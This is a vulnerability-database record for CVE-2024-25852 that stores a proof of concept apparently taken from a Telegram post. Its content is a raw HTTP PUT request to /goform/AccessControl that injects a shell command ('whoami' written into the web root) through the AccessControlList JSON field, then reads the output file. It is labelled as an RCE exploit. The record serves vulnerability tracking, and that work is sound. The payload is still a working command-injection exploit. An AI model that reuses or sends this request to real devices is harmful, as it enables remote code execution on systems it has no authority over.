{"uuid": "682eb2a9-a610-40c3-8abd-0a39acaf47b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-25852", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2361", "content": "CVE-2024-25852 rce\n\nPUT /goform/AccessControl HTTP/1.1\nHost: 127.0.0.1\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate, br\nConnection: close\nUpgrade-Insecure-Requests: 1\n \n{\"AccessPolicy\":\"0\",\"AccessControlList\":\"whoami&gt;/etc_ro/lighttpd/RE7000_www/2.txt\"}\n\nwhoami \n\n/2.txt\n\n#poc #exploit", "creation_timestamp": "2024-04-22T01:02:10.000000Z"}